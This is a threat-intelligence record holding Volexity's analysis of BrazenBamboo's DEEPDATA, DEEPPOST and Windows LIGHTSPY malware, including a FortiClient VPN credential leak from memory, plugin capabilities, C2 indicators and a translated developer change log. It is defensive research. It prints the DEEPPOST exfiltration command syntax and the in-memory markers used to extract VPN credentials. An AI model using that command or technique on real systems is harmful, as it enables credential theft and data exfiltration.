{
	"id": "049915e4-eead-4bb7-ad51-f90515e714e8",
	"created_at": "2026-04-06T00:13:43.132213Z",
	"updated_at": "2026-04-10T13:12:48.729291Z",
	"deleted_at": null,
	"sha1_hash": "9b1d0db685cc28db58e242b341974a2c6f79cd0d",
	"title": "BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 914502,
	"plain_text": "BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN\r\nCredentials via DEEPDATA\r\nBy mindgrub\r\nPublished: 2024-11-15 · Archived: 2026-04-02 11:20:52 UTC\r\n[Update: At the time of publication, this vulnerability had not been addressed by Fortinet. On December 18, 2024,\r\nFortinet published a public acknowledgement of the issue, affected versions, as well as patching \u0026 workaround\r\nadvice.]\r\nIn July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s\r\nWindows VPN client that allowed credentials to be stolen from the memory of the client’s process. This\r\nvulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is\r\na modular post-exploitation tool for the Windows operating system that is used to gather a wide range of\r\ninformation from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials\r\nfrom FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability.\r\nSince the time of Volexity’s initial discovery and reporting to Fortinet, ThreatFabric and Blackberry have each\r\npublished reports that cover different aspects of some of the content discussed in this post.  \r\nVolexity attributes the development of DEEPDATA to a Chinese state-affiliated threat actor that it tracks as\r\nBrazenBamboo. Volexity has observed links between BrazenBamboo and three distinct malware families:\r\nLIGHTSPY, DEEPDATA, and DEEPPOST. Volexity tracks BrazenBamboo as the developer of these malware\r\nfamilies and not necessarily one of the operators using them (there may be many). 
Volexity has also identified a\r\nnew Windows variant of LIGHTSPY that was not previously documented at the time of writing.\r\nThis blog post details the use and functionality of DEEPDATA, with a key look at zero-day exploitation of the\r\nFortiClient vulnerability, and how DEEPPOST is used to exfiltrate files from compromised systems. This blog\r\npost also looks at the recently discovered Windows variant of LIGHTSPY, including notable changes, and the\r\nassociated wider command-and-control (C2) infrastructure of the BrazenBamboo threat actor.\r\nMalware Analysis\r\nVolexity’s analysis began with discovery of an archive file named deepdata.zip\r\n(SHA256: 666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724) that is tied to\r\nBrazenBamboo. This archive contains several files that are part of two Windows malware families, which Volexity\r\nrefers to as DEEPDATA and DEEPPOST. Each malware family is analyzed in the sections that follow. Volexity\r\nalso separately obtained and analyzed a new Windows variant of LIGHTSPY that is described further below.\r\nDEEPDATA\r\nhttps://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/\r\nPage 1 of 16\n\nAs previously mentioned, DEEPDATA is a modular post-exploitation tool for Windows that facilitates collection\r\nof sensitive information from a compromised system. This tool must be run from the command line of a system by\r\nan attacker. The DEEPDATA malware elements include the following:\r\nFilename Description\r\ndata.dll DEEPDATA Loader\r\nmod.dat DEEPDATA Virtual File System (VFS)\r\nreadme.txt File containing DEEPDATA Execution Options\r\nThe readme.txt file describes how to execute the DEEPDATA loader, along with available parameters and a\r\ndecryption key.\r\nThe key parameter is used by the DEEPDATA loader file to decrypt and load the “core” components of the\r\nDEEPDATA malware family stored in the local VFS file (mod.dat). 
These components will always execute and\r\nare not dependent on additional parameters passed on the command line.\r\nThe core components of DEEPDATA include the following files:\r\nFilename Purpose\r\nframe.dll Shellcode – core orchestrator for plugin execution\r\nffmpeg.dll Contains Heaven’s Gate code to load 32-bit code in 64-bit processes\r\nvertdll.dll Collects event logs\r\niumdll.dll Library used to collect locally stored WeChat data\r\nucrtbase_enclave.dll Library used to collect locally stored Feishu data\r\nd3dcompiler_47.dll Checks the running instant messaging apps (Line, Feishu, WeChat)\r\nThe architecture of DEEPDATA’s loader, core, and plugins is shown below.\r\nThe core components are always included in the VFS files, but Volexity was only able to find frame.dll stored\r\non the C2 servers. While DEEPDATA plugins are stored in the VFS files, they are also stored as their own\r\ndedicated files on the C2 servers; they can be loaded from either location. 
The DEEPDATA plugins in the VFS are\r\ndecrypted using the same key as the other components in the VFS.\r\nThe overall plugin logic is the same as that seen in LIGHTSPY malware samples, with the following exported\r\nfunctions used by the core orchestrator:\r\nExecuteCommand\r\nGetPluginCommandID\r\nGetPluginName\r\nGetPluginVersion\r\nDEEPDATA maintains configuration data within the VFS file with the following files stored in an encrypted state:\r\nFilename Description\r\nconfig.json Contains DEEPDATA configuration information\r\nmanifest.json Contains DEEPDATA plugin information\r\nmanifest1.json Contains DEEPDATA plugin information\r\ndate.ini Purpose unclear, contains a single byte of 0x30\r\nThe manifest.json file is also stored on the C2 server but in an unencrypted state.\r\nVolexity identified a total of 12 unique plugins for DEEPDATA, which are summarized below:\r\nPlugin Name Plugin Capabilities\r\nAccountInfo Steal credentials from 18 different sources on the compromised device.\r\nAppData Collect data from WeChat, WhatsApp and Signal on the compromised device.\r\nAudio Record audio on compromised devices.\r\nChatIndexedDb Steal databases from WhatsApp and Zalo chat clients.\r\nFortiClient Extract credentials and server information from process memory of FortiClient VPN processes.\r\nOutlook Collect contacts and emails from local Microsoft Outlook instances.\r\nSocialSoft Steal data from WeChat, Line, QQ, DingDing, Skype, Telegram, and Feishu applications.\r\nSoftwareList List installed software, folders, and files recursively from a base location.\r\nSystemInfo Gather basic enumeration information from the compromised device.\r\nTdMonitor Hook Telegram to retrieve messages from the application.\r\nWebBrowser Collect history, cookies, and passwords from Firefox, Chrome, Opera, and Edge web browsers.\r\nWifiList Collect details of stored WiFi keys and nearby hotspots.\r\nAs shown above, DEEPDATA supports a wide range of functionality to extract data from victims’ systems. The\r\nobserved functionality of several plugins is commonly seen and includes items typically stolen from victim\r\nsystems. However, Volexity noted the FortiClient plugin was uncommon and investigated it further. Volexity\r\nfound the FortiClient plugin was included through a library with the filename msenvico.dll. This plugin was\r\nfound to exploit a zero-day vulnerability in the Fortinet VPN client on Windows that allows it to extract the\r\ncredentials for the user from memory of the client’s process.\r\nAs seen in the code snippet below, the FortiClient plugin looks for the username, password, remote gateway, and\r\nport from two different JSON objects in memory.\r\nThis is similar to a previously documented vulnerability identified in 2016, where credentials could be discovered\r\nin memory based on hardcoded offsets in memory. The previous vulnerability does not have an associated CVE.\r\nVolexity verified the presence of these JSON objects in memory and confirmed this approach works against the\r\nlatest version available at the time of discovery (v7.4.0). Notably, the same approach does not work against older\r\nversions of the Fortinet VPN client. Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet\r\nacknowledged the issue on July 24, 2024. At the time of writing, this issue remains unresolved and Volexity is not\r\naware of an assigned CVE number.\r\nDEEPPOST\r\nDEEPPOST is a post-exploitation data exfiltration tool used to send files to a remote system. 
The following\r\nsample was analyzed:\r\nName(s) localupload.exe\r\nSize 618.5KB (633344 Bytes)\r\nFile Type application/x-dosexec\r\nMD5 533297a7084039bf6bda702b752e6b82\r\nSHA1 20214e2e93b1bb37108aa1b8666f6406fabca8a0\r\nSHA256 f4e72145e761bcc8226353bb121eb8e549dc0000c6535bfa627795351037dc8e\r\nVirusTotal First Submitted N/A\r\nDEEPPOST supports the following syntax:\r\nlocalupload.exe c:\\data_to_exfiltrate\\ ip:port\r\nExfiltration is performed via HTTPS to a hardcoded API endpoint, /api/third/file/upload/, usually on port\r\n29983 (although this is not a default and would be set by the operator at the command line).\r\nLIGHTSPY Background\r\nThe LIGHTSPY malware family was publicly documented in 2020, when Kaspersky and Trend Micro reported on\r\na mobile malware campaign targeting individuals in Hong Kong. More recently, Lookout and ThreatFabric\r\ndiscussed LIGHTSPY mobile malware campaigns. Lookout linked malware they call “DragonEgg” (LIGHTSPY)\r\nto another malware family, WyrmSpy, and to a Department of Justice indictment regarding APT41. The macOS\r\nvariant of LIGHTSPY was discussed by Huntress and ThreatFabric, with the latter also detailing some associated\r\nC2 management infrastructure.\r\nTo summarize what is known and reported, LIGHTSPY is a multi-platform malware family with documented\r\nvariants for Android, iOS, and macOS. Kaspersky and ThreatFabric previously identified references to the\r\nexistence of variants for Windows, Linux, and Router, but they did not document further analysis.\r\nVolexity was able to retrieve copies of LIGHTSPY written specifically for Windows. In contrast to other\r\nLIGHTSPY variants, the Windows variant was not encoded with the same incremental XOR algorithm. 
Rather, it\r\nwas encoded with a more complex algorithm that also included padding at the beginning of the files. The\r\narchitecture for the Windows variant of LIGHTSPY is different from other documented OS variants. This variant\r\nis deployed by an installer that deploys a library to execute shellcode in memory. The shellcode downloads and\r\ndecodes the orchestrator component from the C2 server (pic32.png for x86 and pic64.png for x64\r\narchitecture).\r\nThe loader used for these samples is BH_A006, which has historically been used to load other malware families. It\r\nis not clear whether this is a commercially available loader or evidence of shared development capabilities across\r\ndifferent operators. A summary of the execution chain is below.\r\nOn first execution, the LIGHTSPY orchestrator sends a 102-byte UDP packet starting with 0x1A5F2E1\r\nfollowed by random bytes. LIGHTSPY expects the server to reply with a packet starting with 0x2A5F2E1. If the\r\nserver replies properly, an account.bin file is created that contains the server answer, which has the same\r\nformat as a MAC address and is internally named “broadband account mac”. If the file already exists, the DNS\r\nrequest is not performed. This UDP handshake is unique to the Windows variant.\r\nLike its counterparts, the Windows variant of LIGHTSPY uses WebSocket and HTTPS for communication, with\r\nWebSocket used for most JSON-based communications and HTTPS for exfiltration. 
An interesting observation to\r\nnote: the user-agent for the HTTPS request is copy-pasted from the macOS variant, as shown below.\r\nThe orchestrator expects all plugins to export the following functions:\r\nExecuteCommand\r\nGetPluginCommandID\r\nGetPluginName\r\nInitial\r\nStopCommand\r\nTime\r\nUnInitial\r\nUnlike the macOS variant, most of the code in the Windows variant is executed in memory. The LIGHTSPY\r\nWindows plugins are summarized below:\r\nPlugin Name Purpose\r\nAudio Records audio using the libavcodev library\r\nBrowser Collects cookies, history, stored credentials, and bookmarks from web browsers\r\nFileManager Provides CRUD operations for files on the device and convenience methods for uploading data to the C2 server\r\nKeyboard Records keystrokes\r\nScreen Records the user’s screen using the libavcodev library\r\nSoftware Collects information on installed software and manages services\r\nTerminal Provides a remote shell for the threat actor to execute commands\r\nVideo Records webcam and audio from the infected device\r\nInfrastructure\r\nDEEPDATA C2 Infrastructure\r\nAt the time of analysis, there were six C2 servers serving DEEPDATA payloads and hosting DEEPDATA-related\r\nmanagement applications. 
These servers were also configured for DEEPDATA usage:\r\nPort Function Technology\r\n28443 DEEPDATA operator application, HTML title “spack-info” Nginx 1.14.0, Django Rest Framework\r\n28992 Hosts the various DEEPDATA plugins \u0026 config files Nginx 1.14.0\r\n28993 Communication channel for DEEPDATA implants/plugins Nginx 1.14.0, Django Rest Framework\r\nThree of the six hosts were also running an API endpoint on port 48993 that, based on the API endpoints,\r\nappeared to be used for managing an instance of the web-crawling framework Scrapy.\r\nVolexity also identified four “keyboard-walk”-style strings used by BrazenBamboo in the URL patterns for\r\nDEEPDATA infrastructure:\r\nqweasdzxc\r\nqazxswedcvfr\r\nasdgdsfdsfasd\r\nasdgdsfee\r\nOne DEEPDATA C2 server had an API endpoint serving a developer change log for the malware. This log was\r\nwritten in Chinese, and the most recent entry was from October 2023; the oldest entry was April 2022. A\r\ntranslated version of the change log is provided in the Appendix.\r\nLIGHTSPY C2 Infrastructure\r\nAt the time of analysis, there were a total of 26 active hosts serving LIGHTSPY payloads. They were always\r\nhosted on a URL path starting with the string 963852741. These servers host various artifacts used in both the\r\ndevelopment \u0026 deployment of LIGHTSPY, including manifest files indicating the current version available for\r\ndownload. When analyzing these manifest files, the last-modified times indicated that LIGHTSPY’s development\r\nbegan in 2019 and continued to be updated into 2024.\r\nThe LIGHTSPY C2 servers are less uniform than DEEPDATA, but generally the plugins are hosted on ports\r\n52202, 43202, or 54602. 
The C2 management infrastructure is hosted on nearby ports (generally 43201, 53501, or\r\n59501) but uses different starting strings for the URL paths:\r\n963852iuy\r\n963852poi\r\nOther BrazenBamboo C2 Infrastructure\r\nBrazenBamboo infrastructure also hosts other applications not directly linked to the LIGHTSPY and DEEPDATA\r\nmalware families. Many are built using the Vue framework and use Vue’s lazy-loading mechanism, which imports\r\nJavaScript and CSS components on demand to decrease loading times. ThreatFabric’s report covered some of the\r\ninteresting aspects of these components. This functionality also reveals evidence of additional unreported\r\ncapabilities of the BrazenBamboo threat actor, including the following:\r\nA “Reptile” email theft platform\r\nA proxy generation platform\r\nA big-data-style analysis platform for stolen data, conveniently named 联网大数据综合分析平台\r\n(English translation: Internet Big Data Comprehensive Analysis Platform)\r\nSeveral configurable delivery methods, which are shown below. Another version of this panel listed the\r\nvulnerability attack as the “0day attack” type.\r\nThere is substantial wording in these applications that would align with a domestic surveillance intent for these\r\ncapabilities. 
The user management aspects of the panel also contain wording that suggests this tooling is used by\r\nmultiple third parties, such as requirements to input an organization when registering a user and the extensive\r\ndocumentation on how to use the platform.\r\nAttribution \u0026 Overlaps\r\nDEEPDATA and LIGHTSPY\r\nThe DEEPDATA malware family has several overlaps with the LIGHTSPY malware family:\r\nPlugin file and export function names\r\nShared program database (PDB) development paths\r\nShared JSON formatting for C2 communications\r\nSimilar formats for JSON configuration files\r\nSimilar plugin code execution flow:\r\nLIGHTSPY (left) and DEEPDATA (right) Audio.dll Plugins\r\nThe DEEPDATA and LIGHTSPY C2 infrastructure also has several overlaps:\r\nHistorically shared the same IP address for hosting plugins\r\nShared TLS certificates\r\nShared URL patterns for operator panels\r\nShared operator applications across C2 servers\r\nVolexity assesses with a high degree of confidence that these two malware families are developed by related\r\nentities and are suitable to be clustered under the same threat actor alias.\r\nPublic Reporting Overlaps\r\nSeveral C2 IP addresses mentioned in public reporting have overlaps with DEEPDATA infrastructure, including\r\nthe following:\r\nIP Address Mention in Public Reports Overlaps\r\n103.27.109[.]217 Huntress’s \u0026 ThreatFabric’s macOS reports Shares a self-signed TLS certificate with all currently active DEEPDATA C2 servers\r\n103.27.108[.]207 ThreatFabric’s Mobile report Shares a self-signed TLS certificate with all currently active DEEPDATA C2 servers\r\n121.201.109[.]98 Lookout’s DragonEgg report Based on VirusTotal Intelligence URL submissions, Volexity assesses with moderate confidence this server historically hosted DEEPDATA plugins\r\nAudit Exposed Credentials with Volexity Volcano\r\nVolexity Volcano is a powerful memory analysis framework that can help investigate systems compromised by\r\nthis threat actor’s malware. It can also be used to proactively audit Windows, Linux, and macOS systems to\r\nidentify other applications that expose credentials in clear text. This is as easy as searching memory for strings\r\nknown to exist near the credentials, such as “remote_gateway” in this case. Another technique is to search for\r\nknown password values after authenticating to a Fortinet VPN connection via FortiClient, and more importantly,\r\nafter an extended period of time, to check for passwords after logging out. Volcano attributes memory pages back\r\nto their owning process or kernel module, which helps associate activity back to applications that may not handle\r\npasswords as securely as possible.\r\nConclusion\r\nVolexity’s analysis provides evidence that BrazenBamboo is a well-resourced threat actor who maintains multi-platform capabilities with operational longevity. The breadth and maturity of their capabilities indicates both a\r\ncapable development function and operational requirements driving development output. 
This evidence, combined\r\nwith the architectural decisions BrazenBamboo has made within their malware and related infrastructure, leads\r\nVolexity to assess with medium confidence that BrazenBamboo is a private enterprise that produces capabilities\r\nfor governmental operators concerned with domestic targets.\r\nSome key elements supporting Volexity’s assessment are below:\r\nThe language used in the C2 operator infrastructure references domestic surveillance and law enforcement\r\ncontexts.\r\nThere is a lack of operational security in the C2 infrastructure, which is typical of foreign intelligence\r\noperations.\r\nThe architecture decisions of DEEPDATA and LIGHTSPY are more typical of standard software\r\ndevelopment practices than malware families.\r\nThere is continued development and operation of LIGHTSPY despite a notable amount of public reporting\r\non its capabilities and indicators.\r\nIn recent years, this style of operation has become well publicized for China-based threat actors, with\r\nnotable examples including Chengdu 404 and iSOON.\r\nThe timestamps associated with the latest payloads for DEEPDATA and LIGHTSPY are evidence that both\r\nmalware families continue to be developed. The backend infrastructure maintained by BrazenBamboo to analyze\r\nthe data retrieved by their malware families offers insight into the scale of this collection, driving a requirement\r\nfor custom analyst software to analyze this data at scale.\r\nTo detect the malware used in this specific attack, Volexity recommends the following:\r\nUse the rules provided here to detect related activity.\r\nBlock the IOCs provided here.\r\nVolexity’s Threat Intelligence research, such as the content from this blog, is published to customers via\r\nits Threat Intelligence Service. 
The details published in this post were shared with customers in a series\r\nof posts between February 2024 and August 2024. Volexity Network Security Monitoring customers are\r\nalso automatically covered through signatures and deployed detections from the threats and IOCs\r\ndescribed in this post.\r\nIf you are interested in learning more about Volexity products and services, please do not hesitate\r\nto contact us.\r\nAppendix\r\nDEEPDATA AccountInfo Plugin Targets\r\nTargeted Service Credential Theft Technique\r\nBaidu Net Disk In memory\r\nOneDrive By hooking web requests in the legitimate process\r\nKeePass In memory, by using the open-source tool KeeFarce\r\nQQ On disk\r\nWindows By using Mimikatz\r\nMail Master On disk, by querying an internal mail.db file\r\nFox Mail On disk, by reading the Account.rec0 file\r\nSquirrelSQL On disk, by reading the SQLAliases23.xml file\r\nDBVisualizer On disk, by reading the dbvis.xml file\r\nOpenSSH On disk, by reading the config and the ssh key files\r\nMobaxterm In registry\r\nWinSCP In registry\r\nSecureCRT On disk, by reading the configuration files\r\nPutty In registry\r\nNavicat In registry\r\nDBeaver On disk, by reading the credentials-config.json file\r\nXshell On disk, by reading the sessions files\r\nXftp On disk, by reading the sessions files\r\nDEEPDATA Change Log [English Translation]\r\n{\r\n\"count\":18, \"next\":null, \"previous\":null, \"results\":[ {\r\n\"id\":23, \"time\":\"2023-10-1310036\", \"content\":\"{\\\"title\\\":\\\"v3.2\\\",\\\"text\\\":\\\"1. Add tg\r\nlocal real-time monitoring;\\n2.tg secret capture and add template parameter\r\nconfiguration;\\n3. Repair the obtained Problems with data display;\\n4. 
Chat software adds\r\ntelegarm display;\\\"}\"\r\n}, {\r\n\"id\":22, \"time\":\"2023-06-30151833\", \"content\":\"{\\\"title\\\":\\\"v3.1\\\",\\\"text\\\":\\\"1. Opera\r\nBrowser is added to the browser type\\n2. Yandex module is added to cookie crawler\r\nparsing\\n3. Whatapp parsing is redone\\n4. New Added signal chat software\\n5. Evidence\r\ncollection mode and monitoring mode can be configured in the template\\\"}\"\r\n}, {\r\n\"id\":21, \"time\":\"2023-05-1218630\", \"content\":\"{\\\"title\\\":\\\"v3.0\\\",\\\"text\\\":\\\"1. Add a new\r\nmonitoring version, the client is online in real time, and realize websocket\r\ncommunication;\\n2. Add the function of issuing environmental recording instructions;\\n3.\r\nAdd the online command issuance function for other functions; \\n4. Fix the problem of\r\nprogram blocking for continuous command issuance; \\n5. Optimize the recording command\r\nissuance interface; \\\"}\"\r\n}, {\r\n\"id\":20, \"time\":\"2023-01-2917537\", \"content\":\"{\\\"title\\\":\\\"V 2.1\\\",\\\"text\\\":\\\"1. Added data\r\nupload display for outlook emails \\n2. Fix a bug in outlook and support Onedrive\r\nacquisition. \\n3. Fixed the process list upload size field out-of-range bug\\\"}\"\r\n}, {\r\n\"id\":19, \"time\":\"2022-11-1118244\", \"content\":\"{\\\"title\\\":\\\"V2.0\\\",\\\"text\\\":\\\"1. Added\r\ntarget instant messaging software forensic information, including: Enterprise WeChat;\r\nforensic content includes session information, session chat content, contact information,\r\nand chat files;\\\"}\"\r\n}, {\r\n\"id\":17, \"time\":\"2022-09-17185754\", \"content\":\"{\\\"title\\\":\\\"V1.5.1\\\",\\\"text\\\":\\\"1. Added the ability to obtain network card and session\r\ninformation; \\n2. 
Fixed the bug of not being able to go online when the terminal mac is\r\nempty; \\n3. Remove batches of local data, drivers, users, and browser passwords; \\n4. Repair\r\nBug in template configuration instructions not being executed;\\n5. Add new specified files\r\n(folders) to upload;\\n6. Add export cache files to chat software;\\n7. Add batch export of\r\nemails;\\n8. Fix system permission acquisition Bug in wx home directory failure;\\\"}\"\r\n}, {\r\n\"id\":16, \"time\":\"2022-08-29182530\", \"content\":\"{\\\"title\\\":\\\"V1.5\\\",\\\"text\\\":\\\"1. The\r\nprogram supports input parameter acquisition tasks, and adds module configuration, which can\r\nbuild in the default extraction function;\\n2. Modify the execution loading method and use\r\nrundll32 for loading;\\n3. Program Encryption processing;\\n4. Simple data extraction through\r\nanti-virus processing, loading data.dll through 360, etc.;\\n5. New template configuration\r\nfunction for the website;\\n6. Local data improvement data details: port status, service\r\ncompany Name, process command line parameters, etc.;\\n7. New chat software WhatsApp,\r\nzalo;\\n8. Other website bug fixes;\\\"}\"\r\n}, {\r\n\"id\":15, \"time\":\"2022-07-1518245\", \"content\":\"{\\\"title\\\":\\\"v1.4\\\",\\\"text\\\":\\\"1. Add local\r\ndata (service list, port list, user list, process list, Driver list) display\\n2. Fix the\r\nproblem of incorrect content in downloading email data attachments\\n3. Fix the problem of\r\ndata exported to csv wps when opening Chinese garbled characters\\n4. Fix the problem of\r\nincorrect user names when crawling Yahoo mailboxes\\n5. Fix the problem of Baidu network\r\ndisk crawling error\\n6. Fix the problem of JD crawling data not being associated\\\"}\"\r\n}, {\r\n\"id\":14, \"time\":\"2022-07-0910226\", \"content\":\"{\\\"title\\\":\\\"v1.3\\\",\\\"text\\\":\\\"1. 
When\r\noptimizing the local directory search, when the content contains special characters, the\r\nreturned content is inaccurate\\n2. Optimize the timeout of deleting old data when re-parsing\r\nlocal directory files, and delete it in the celery task instead\\n3. Fix the problem of\r\nchromium browser obtaining mailbox cookies\\n4. Fix the problem of wx.mail.com, WeChat scan\r\nThe problem of not crawling emails when logging into QQ mailbox with code\\n5. Fix the\r\nproblem of crawling communication in QQ mailbox\\n6. Optimize file directory acquisition,\r\nfrom only obtaining c:/user to obtaining files under c drive All files outside the system\r\nfolder\\n\\\"}\"\r\n}, {\r\n\"id\":12, \"time\":\"2022-07-0116723\", \"content\":\"{\\\"title\\\":\\\"v1.2.6\\\",\\\"text\\\":\\\"1. Add batch\r\nexport of chat data including WeChat, Line, DingTalk, Skype, Feishu\\n2. Add batch export of\r\nbrowser data, including browsers History, browser cookies\\n3. Add export task display,\r\nexport progress, and download functions. \\n4. Fix the problem of WeChat voice files not\r\nbeing found\\n5. Fix the bug of obtaining the file directory under system permission\\n6.\r\nAutomatically delete the file version after the output execution program is completed\\n7.\r\nFix the Skype update version modification program Get cookie path\\\"}\"\r\n}, {\r\n\"id\":11, \"time\":\"2022-06-25101259\", \"content\":\"{\\\"title\\\":\\\"v1.2.5\\\",\\\"text\\\":\\\"1. Optimize\r\nthe method of skype forensics from directly uploading TOKEN to directly uploading cookie\r\nfiles\\n2.Skype forensic information analysis module adds cookie file parsing operation\\n3.\r\nAdd target machine file directory information upload, including File size data, supports\r\nsearching for files or folders in specified directories\\n4. 
Fix the bug of losing Skype chat\r\nrecords when crawling files/voices/videos and other message records\\n5. Fix the problem of\r\nprogram crash when executing under system permissions\\\"}\"\r\n}, {\r\n\"id\":10, \"time\":\"2022-06-11122341\", \"content\":\"{\\\"title\\\":\\\"v1.2.4\\\",\\\"text\\\":\\\"1. New\r\ntarget group management\\n2. New system user management and role management\\n3. New target\r\nforensic data deletion, including specific forensic batch data deletion (including data +\r\nfiles), all batch deletion, terminal Delete\\\"}\"\r\n}, {\r\n\"id\":9, \"time\":\"2022-06-04122318\", \"content\":\"{\\\"title\\\":\\\"v1.2.3\\\",\\\"text\\\":\\\"1. New\r\ndisplay of travel evidence collection data, including travel account information, order\r\nlist, common consignee addresses (contact information)\\n2. New display of evidence\r\ncollection documents, including records of previous evidence collection documents, and the\r\nnumber of evidence collection documents Re-analysis function\\n3. New log audit function,\r\nincluding the operation log of the platform system, the forensic log of the forensic tool,\r\nand the analysis log of the forensic file\\\"}\"\r\n}, {\r\n\"id\":8, \"time\":\"2022-05-28122318\", \"content\":\"{\\\"title\\\":\\\"v1.2.2\\\",\\\"text\\\":\\\"1. New\r\ntarget WIFI information collection, including surrounding wifi list, local WIFI password\\n2.\r\nNewly added e-commerce forensic data display, including e-commerce account information,\r\norder list, common harvest address (contact information)\\\"}\"\r\n}, {\r\n\"id\":7, \"time\":\"2022-05-21122318\", \"content\":\"{\\\"title\\\":\\\"v1.2.1\\\",\\\"text\\\":\\\"1. Added\r\ntarget instant messaging software forensic information, including Feishu and Skype;\r\nForensic content includes session information, session chat content, contact information,\r\nchat files\\n2. 
New instant messaging data display, including session information, session\r\nmembers, contact (friends) list, chat content, chat files, etc., supported Various commonly\r\nused operating functions, such as session retrieval, chat content retrieval (including\r\ncontextual viewing), chat file retrieval\\\"}\"\r\n}, {\r\n\"id\":6, \"time\":\"2022-05-14122318\", \"content\":\"{\\\"title\\\":\\\"v.1.1.2\\\",\\\"text\\\":\\\" 1. Added\r\ntarget instant messaging software forensic information, including Line and DingTalk;\r\nforensic content includes session information, session chat content, contact information,\r\nchat files\\n2. New browser cookies are added to collect evidence on target network identity\r\ndata information, including\\n 2.1 E-commerce forensics (such as JD.com, Taobao, Meituan)\\n\r\n2.2 Travel evidence collection (Ctrip, Qunar.com)\\n3. New email forensic data display,\r\nincluding email account information, email folder information, email list, email EML\r\ncontent\\\"}\"\r\n}, {\r\n\"id\":5, \"time\":\"2022-05-07122318\", \"content\":\"{\\\"title\\\":\\\"v1.1.1\\\",\\\"text\\\":\\\"1. Add\r\ntarget instant messaging software forensic information, Including WeChat; forensic content\r\nincludes session information, session chat content, contact information, and chat files\\n2.\r\nNew browser cookies are added to collect evidence on the target network identity data\r\ninformation, including\\n 2.1. Email forensics (such as NetEase email, QQ mailbox, 139\r\nmailbox, 189 mailbox, yahoo mailbox, hotmail mailbox, Gmail mailbox, etc.)\\\"}\"\r\n}, {\r\n\"id\":4, \"time\":\"2022-04-25122318\", \"content\":\"{\\\"title\\\":\\\"v1.1.0\\\",\\\"text\\\":\\\"1. 
Add\r\ntarget basic information collection, including machine name, IP address, Mac address, brand,\r\nmodel, operating system, resolution, memory, CPU, etc.\\n2. Add target browser data\r\ninformation, including browser access records, browser cookie information, browser password\r\ninformation\\\"}\"\r\n}\r\n]\r\n}\r\nSource: https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/"
	],
	"report_names": [
		"brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c7d9878a-e691-4c6f-81ae-84fb115a1345",
			"created_at": "2022-10-25T16:07:23.359506Z",
			"updated_at": "2026-04-10T02:00:04.556639Z",
			"deleted_at": null,
			"main_name": "APT 41",
			"aliases": [
				"BrazenBamboo",
				"Bronze Atlas",
				"Double Dragon",
				"Earth Baku",
				"G0096",
				"Grayfly",
				"Operation ColunmTK",
				"Operation CuckooBees",
				"Operation ShadowHammer",
				"Red Kelpie",
				"SparklingGoblin",
				"TA415",
				"TG-2633"
			],
			"source_name": "ETDA:APT 41",
			"tools": [
				"9002 RAT",
				"ADORE.XSEC",
				"ASPXSpy",
				"ASPXTool",
				"AceHash",
				"Agent.dhwf",
				"Agentemis",
				"AndroidControl",
				"AngryRebel",
				"AntSword",
				"BLUEBEAM",
				"Barlaiy",
				"BlackCoffee",
				"Bladabindi",
				"BleDoor",
				"CCleaner Backdoor",
				"CHINACHOPPER",
				"COLDJAVA",
				"China Chopper",
				"ChyNode",
				"Cobalt Strike",
				"CobaltStrike",
				"Crackshot",
				"CrossWalk",
				"CurveLast",
				"CurveLoad",
				"DAYJOB",
				"DBoxAgent",
				"DEADEYE",
				"DEADEYE.APPEND",
				"DEADEYE.EMBED",
				"DEPLOYLOG",
				"DIRTCLEANER",
				"DUSTTRAP",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"DodgeBox",
				"DragonEgg",
				"ELFSHELF",
				"EasyNight",
				"Farfli",
				"FunnySwitch",
				"Gh0st RAT",
				"Ghost RAT",
				"HDD Rootkit",
				"HDRoot",
				"HKDOOR",
				"HOMEUNIX",
				"HUI Loader",
				"HidraQ",
				"HighNoon",
				"HighNote",
				"Homux",
				"Hydraq",
				"Jorik",
				"Jumpall",
				"KEYPLUG",
				"Kaba",
				"Korplug",
				"LATELUNCH",
				"LOLBAS",
				"LOLBins",
				"LightSpy",
				"Living off the Land",
				"Lowkey",
				"McRAT",
				"MdmBot",
				"MessageTap",
				"Meterpreter",
				"Mimikatz",
				"MoonBounce",
				"MoonWalk",
				"Motnug",
				"Moudour",
				"Mydoor",
				"NTDSDump",
				"PACMAN",
				"PCRat",
				"PINEGROVE",
				"PNGRAT",
				"POISONPLUG",
				"POISONPLUG.SHADOW",
				"POTROAST",
				"PRIVATELOG",
				"PipeMon",
				"PlugX",
				"PortReuse",
				"ProxIP",
				"ROCKBOOT",
				"RbDoor",
				"RedDelta",
				"RedXOR",
				"RibDoor",
				"Roarur",
				"RouterGod",
